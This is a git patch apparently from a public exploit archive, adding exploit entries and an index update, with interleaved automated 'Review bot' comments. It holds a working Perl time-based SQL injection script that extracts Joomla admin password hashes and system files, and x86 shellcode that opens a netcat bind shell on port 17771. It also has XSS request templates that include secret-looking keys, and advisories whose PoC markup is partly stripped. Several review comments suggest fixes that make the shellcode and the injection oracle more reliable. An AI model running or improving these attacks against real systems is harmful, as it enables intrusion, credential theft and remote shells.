From b2d25f8fa5056e1304fcc2f75dcdc6f05416975d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 7 May 2015 05:03:16 +0000 Subject: [PATCH] DB: 2015-05-07 9 new exploits --- files.csv | 11 +- platforms/hardware/remote/4522.html | 62 +++---- platforms/ios/dos/36903.txt | 162 +++++++++++++++++ platforms/ios/webapps/36922.txt | 263 ++++++++++++++++++++++++++++ platforms/lin_x86/shellcode/36921.c | 51 ++++++ platforms/php/webapps/36913.pl | 125 +++++++++++++ platforms/php/webapps/36914.txt | 61 +++++++ platforms/php/webapps/36916.txt | 9 + platforms/php/webapps/36917.txt | 43 +++++ platforms/windows/local/36920.py | 50 ++++++ platforms/windows/remote/36803.py | 47 ----- platforms/windows/remote/36915.txt | 10 ++ 12 files changed, 815 insertions(+), 79 deletions(-) create mode 100755 platforms/ios/dos/36903.txt create mode 100755 platforms/ios/webapps/36922.txt create mode 100755 platforms/lin_x86/shellcode/36921.c create mode 100755 platforms/php/webapps/36913.pl create mode 100755 platforms/php/webapps/36914.txt create mode 100755 platforms/php/webapps/36916.txt create mode 100755 platforms/php/webapps/36917.txt create mode 100755 platforms/windows/local/36920.py delete mode 100755 platforms/windows/remote/36803.py create mode 100755 platforms/windows/remote/36915.txt diff --git a/files.csv b/files.csv index d41f01845..3c0e7842e 100755 --- a/files.csv +++ b/files.csv 
@@ -4164,6 +4164,7 @@ id,file,description,date,author,platform,type,port
 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0
 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability",2007-10-11,0in,php,webapps,0
 4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0
+4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0
 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0
 4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0
 4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0
@@ -33207,7 +33208,7 @@ id,file,description,date,author,platform,type,port
 36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
 36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
 36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
-36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
+36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
 36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
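Review bot: The rewritten `36803` row now points at `platforms/linux/remote/36803.py`, but this commit only deletes `platforms/windows/remote/36803.py` (see the diffstat and the `delete mode` line in the header) and adds nothing under `platforms/linux/remote/`, so unless that copy already exists in the tree the index entry dangles. If the intent was a move, recording it as a rename (`git mv`) would keep the content attached to the row; otherwise the linux file has to land in the same commit. A check such as `test -f platforms/linux/remote/36803.py` before regenerating files.csv would catch this kind of index drift.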
@@ -33293,12 +33294,20 @@ id,file,description,date,author,platform,type,port 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 +36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0 +36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0 +36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 'src' Parameter SQL Injection Vulnerability",2012-03-07,"Rob Miller",php,webapps,0 +36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-03-07,"Filippo Cavallarin",php,webapps,0 36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (MSF)",2015-05-04,"TUNISIAN CYBER",windows,local,0 36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x 'select_users_template' Parameter Local File Include Vulnerability",2012-03-05,"Aung Khant",php,webapps,0 36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 +36913,platforms/php/webapps/36913.pl,"Joomla! 
'redirect.php' SQL Injection Vulnerability",2012-03-05,"Colin Wong",php,webapps,0 36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0 36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web Vulnerability",2015-05-04,Vulnerability-Lab,ios,webapps,0 +36920,platforms/windows/local/36920.py,"Mediacoder 0.8.34.5716 - Buffer Overflow SEH Exploit (.m3u)",2015-05-06,evil_comrade,windows,local,0 +36921,platforms/lin_x86/shellcode/36921.c,"Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 Bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 +36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0 36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0 36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 diff --git a/platforms/hardware/remote/4522.html b/platforms/hardware/remote/4522.html index cc5531449..d852690ef 100755 --- a/platforms/hardware/remote/4522.html +++ b/platforms/hardware/remote/4522.html @@ -1,31 +1,31 @@ - - - - - - -# milw0rm.com [2007-10-11] + + + + + + +# milw0rm.com [2007-10-11] diff --git a/platforms/ios/dos/36903.txt b/platforms/ios/dos/36903.txt new file mode 100755 index 000000000..ced6b8bd4 --- /dev/null +++ b/platforms/ios/dos/36903.txt 
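Review bot: The rows added in this hunk break the ascending-id order the rest of files.csv keeps: `36914`–`36917` are inserted ahead of `36909`, `36913` lands after `36912`, and `36920`–`36922` sit between `36904` and `36906`. Tools that binary-search or diff the index by id will misbehave on these, and later merges will conflict on the same lines, so the rows belong at their numeric position. The `36913` description `"Joomla! 'redirect.php' SQL Injection Vulnerability"` also carries no version while the script it points at states `Joomla <2.5.1`; adding that keeps it consistent with the other Joomla entries. This hunk starts on the previous page line.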
@@ -0,0 +1,162 @@ +Document Title: +=============== +Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1418 + + +Release Date: +============= +2015-05-02 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1418 + + +Common Vulnerability Scoring System: +==================================== +3.3 + + +Product & Service Introduction: +=============================== +Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there. +With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app +every day -- you’ll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device’s +location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is +entirely your call. + +(Copy of the Vendor Homepage: http://grindr.com/learn-more ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official Grindr v2.1.1 iOS mobile web-application. 
+ + +Vulnerability Disclosure Timeline: +================================== +2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security) +2015-01-22: Vendor Notification (Grinder - Bug Bounty Program) +2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program) +2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x) +2015-05-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Grindr LLC +Product: Grinder - iOS Mobile Web Application (API) 2.2.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application. + +The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module. +After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the +contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app. +The issue is local and remote exploitable. + +Vulnerable Module(s): +[+] Edit Profile + +Vulnerable Parameter(s): (Input) +[+] Display Name + +Affected Module(s): +[+] Contact > Social Network > Copy Link + + + +Proof of Concept (PoC): +======================= +The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click). +To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue. + +Manual steps to reproduce ... +1. Open the grindr mobile application +2. 
Inject a script code tag as Display Name or use the terminated String with empty values +3. Save and click in the profile the contact button (exp. facebook) +4. Click to the send button ahead and push the Copy Link function +5. The app service is getting terminated with an uncaught exception because of an internal parsing error + +Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button. + +PoC Video: + + +Solution - Fix & Patch: +======================= +First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself. +The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register +an account and to insert own scripts or null strings that corrupts the process of copy the link by an error. After the restriction has been +set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that +was only a solution to prevent. + +To fix the bug ... +Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error +folder that has been synced. Get the error attach another debugger and so on ... + + +Security Risk: +============== +The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. 
Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. 
To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/ios/webapps/36922.txt b/platforms/ios/webapps/36922.txt new file mode 100755 index 000000000..ba21d6a21 --- /dev/null +++ b/platforms/ios/webapps/36922.txt 
@@ -0,0 +1,263 @@ +Document Title: +=============== +vPhoto-Album v4.2 iOS - File Include Web Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1477 + + +Release Date: +============= +2015-05-05 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1477 + + +Common Vulnerability Scoring System: +==================================== +6.2 + + +Product & Service Introduction: +=============================== +vPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos, +while giving you an unprecedented user experience. No in-app purchase, no functional limitations. + +(Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-05: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Cheng Chen +Product: vPhoto-Album - iOS Web Application (Wifi) 4.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system +specific path commands to compromise the mobile web-application. + +The vulnerability is located in the `name` value of the wifi interface module. 
Local attackers are able to manipulate the +wifi web interface by usage of the vulnerable sync function. The sync does not encode or parse the context of the albumname. + +Local attacker are able to manipulate the input of the folder path value to exploit the issue by web-application sync. +The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application. +The request method to inject is a sync and the attack vector is located on the application-side of the affected service. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1. +Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation +of the local file include web vulnerability results in mobile application or connected device component compromise. + +Vulnerable Method(s): + [+] [Sync] + +Vulnerable Module(s): + [+] Albumname + +Vulnerable Parameter(s): + [+] name + +Affected Module(s): + [+] File Dir Index + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + + +PoC: http://localhost:8080/ + + +

">(2)

Camera Roll(2)

+ + + +

+ + +Reference(s): +http://localhost:8080/ + + +Security Risk: +============== +The security riskof the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. 
+ +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + + diff --git a/platforms/lin_x86/shellcode/36921.c b/platforms/lin_x86/shellcode/36921.c new file mode 100755 index 000000000..ab97a118b --- /dev/null +++ b/platforms/lin_x86/shellcode/36921.c 
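Review bot: The PoC does not support the "local file include" claim: what survives of it (`">(2)` and `Camera Roll(2)` inside the index listing) looks like an album name injected unescaped into the WiFi interface's directory-listing HTML, i.e. stored HTML/script injection through the `name` value, and no file path or traversal sequence appears anywhere in the text. The scoring is inconsistent as well — the header says CVSS 6.2, Technical Details says 7.1 — and the version is given as both 4.2 and 4.1. The markup in the PoC block appears to have been stripped on import, so the actual payload is lost; stating it in escaped plain text would make the finding reproducible and would settle which vulnerability class it is.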
@@ -0,0 +1,51 @@ +/* +# Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode +# This shellcode will listen on port 17771 and give you /bin/sh +# Shellcode Author: Oleg Boytsev +# Tested on: Debian GNU/Linux 7/i686 +# Shellcode Length: 58 +# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode + +global _start +section .text + _start: + xor eax, eax + xor edx, edx + push eax + push 0x31373737 ;-vp17771 + push 0x3170762d + mov esi, esp + + push eax + push 0x68732f2f ;-le//bin//sh + push 0x6e69622f + push 0x2f656c2d + mov edi, esp + + push eax + push 0x636e2f2f ;/bin//nc + push 0x6e69622f + mov ebx, esp + + push edx + push esi + push edi + push ebx + mov ecx, esp + mov al,11 + int 0x80 +*/ + +#include +#include + +unsigned char shellcode[] = +"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n",strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + ret(); +} + diff --git a/platforms/php/webapps/36913.pl b/platforms/php/webapps/36913.pl new file mode 100755 index 000000000..fbf82dc47 --- /dev/null +++ b/platforms/php/webapps/36913.pl 
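Review bot: The C harness as committed will not build: both `#include` directives have lost their header names (presumably `<stdio.h>` and `<string.h>`), `main()` has no return type, and `strlen` is applied to an `unsigned char[]` and printed with `%d`. The fix is `#include <stdio.h>` / `#include <string.h>` plus `int main(void)` and `printf("Shellcode Length: %zu\n", strlen((const char *)shellcode));`. Two caveats belong in the header comment: the payload depends on `nc -e`, which only exists in netcat-traditional builds (the stated Debian 7 box ships one; netcat-openbsd rejects `-e`), and there is no `exit` syscall after `int 0x80`, so if `/bin/nc` is absent execution runs off the end of the buffer instead of terminating cleanly. The 58-byte, null-free encoding itself checks out against the assembly listing.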
@@ -0,0 +1,125 @@ +source: http://www.securityfocus.com/bid/52312/info + +Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +#!/usr/bin/perl +# Thu Mar 15 22:55:32 CET 2012 A. Ramos +# www.securitybydefault.com +# Joomla <2.5.1 time based sql injection - vuln by Colin Wong +# +# using sleep() and not benchmark(), change for < mysql 5.0.12 +# +# 1.- Database name: database() +# 2.- Users data table name: (change 'joomla' for database() result) +# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users" +# 3.- Admin password: (change zzz_users from previus sql query result) +# select password from zzzz_users limit 1 + + + +use strict; +use LWP::UserAgent; +$| = 1; + + +my $url = $ARGV[0]; +my $wtime = $ARGV[1]; +my $sql = $ARGV[2]; + +unless ($ARGV[2]) { + print "$0 \n"; + print "\texamples:\n"; + print "\t get admin password:\n"; + print "\t\t$0 http://host/joomla/ 3 'database()'\n"; + print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n"; + print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n"; + print "\t get file /etc/passwd\n"; + print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n"; + exit 1; +} + +my ($len,$sqldata); + +my $ua = LWP::UserAgent->new; +$ua->timeout(60); +$ua->env_proxy; + +my $stime = time(); +my $res = $ua->get($url); +my $etime = time(); +my $regrtt = $etime - $stime; +print "rtt: $regrtt secs\n"; +print "vuln?: "; + +my $sleep = $regrtt + $wtime; +$stime = time(); +$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1"); +$etime = time(); +my $rtt = $etime - $stime; 
+if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; } + + +my $lenoflen; +sub len { + # length of length + for (1..5) { + my $sql=$_[0]; + $stime = time(); + $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1"); + $etime = time(); + my $rtt = $etime - $stime; + if ($rtt >= $regrtt + $wtime) { + $lenoflen = $_; + last; + } + } + for (1..$lenoflen) { + my $ll; + $ll=$_; + for (0..9) { + my $sql=$_[0]; + $stime = time(); + $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1"); + $etime = time(); + my $rtt = $etime - $stime; + if ($rtt >= $regrtt + $wtime) { + $len .= $_; + } + } + } + return $len; + +} + +sub data { + my $sql = $_[0]; + my $len = $_[1]; + my ($bit, $str, @byte); + my $high = 128; + + for (1..$len) { + my $c=8; + @byte=""; + my $a=$_; + for ($bit=1;$bit<=$high;$bit*=2) { + $stime = time(); + # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1'; + $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1"); + $etime = time(); + my $rtt = $etime - $stime; + if ($rtt >= $regrtt + $wtime) { + $byte[$c]="0"; + } else { $byte[$c]="1"; } + $c--; + } + $str = join("",@byte); + print pack("B*","$str"); + } +} + +$len = len($sql); +print "$sql length: $len\n"; +print "$sql data:\n\n"; +data($sql,$len); \ No newline at end of file diff --git a/platforms/php/webapps/36914.txt b/platforms/php/webapps/36914.txt new file mode 100755 index 000000000..b06b45bc5 --- /dev/null +++ b/platforms/php/webapps/36914.txt 
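Review bot: The file as committed does not run as a script: the SecurityFocus summary prepended above `#!/usr/bin/perl` (`source: http://...`, `Joomla! is prone to ...`) is parsed as Perl and fails to compile, so that text should move under the shebang as `#` comments. In `len`, a single jittery response corrupts the result: the digit loop `for (0..9)` appends every digit whose request exceeds the threshold because there is no `last`, and if no length-of-length probe matches, `$lenoflen` stays undefined and `len` returns undef, which then drives `data()` with an empty loop and prints nothing. Adding `last;` after `$len .= $_;` and dying with a message when `$lenoflen` is unset would make the timing oracle fail loudly; a retry or majority vote per probe is the usual hardening for time-based extraction over a noisy link.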
@@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/52319/info + +Fork CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. + +Fork CMS 3.2.7 and 3.2.6 are vulnerable; other versions may also be affected. + +http://www.example.com/private/en/locale/edit?id=37&value="> + +http://www.example.com/private/en/locale/edit?id=37&name="> + +http://www.example.com/private/en/locale/edit?id=37&type[]="> + +http://www.example.com/private/en/locale/edit?id=37&module="> + +http://www.example.com/private/en/locale/edit?id=37&application="> + +http://www.example.com/private/en/locale/edit?id=37&language[]="> + +Parameter: form_token +Method: POST + + - POST /private/en/authentication/?querystring=/private/en HTTP/1.1 + Content-Length: 134 + Content-Type: application/x-www-form-urlencoded + Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B + Host: localhost:80 + Connection: Keep-alive + Accept-Encoding: gzip,deflate + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) + + backend_email=&backend_password=&form=authenticationIndex&form_token=">&login=Log%20in + +Parameters: position_1, position_2, position_3, position_4 +Method: POST + + - POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1 + + 
form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1=">&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D + +Parameter: success_message +Method: POST + + - POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1 + + form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message=">&identifier=contact-en + +Parameter: smtp_password +Method: POST + + - POST http://localhost/private/en/settings/email HTTP/1.1 + + form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="> + +Parameters: site_html_footer, site_html_header +Method: POST + + - POST http://localhost/private/en/settings/index HTTP/1.1 + + form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer=">&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret= \ No newline at end of file diff --git a/platforms/php/webapps/36916.txt b/platforms/php/webapps/36916.txt new file mode 100755 index 000000000..49c95f814 --- /dev/null 
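Review bot: Every payload in this PoC has been truncated to `">` — the script element that followed is gone — so none of the URLs or POST bodies reproduce the XSS as published, and the advisory needs the payload restored in escaped form. The requests also ship a `PHPSESSID` cookie, a `form_token`, `fork_api_private_key` and a CKFinder license key from the test instance; even if these are throwaway values, secret-looking material should be redacted before publication. Worth noting for triage: only the `form_token` case on `/private/en/authentication/` is reachable pre-auth; the other requests post to `/private/en/...` backend forms and so require an authenticated admin, which limits them to CSRF-chained or self-XSS scenarios.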
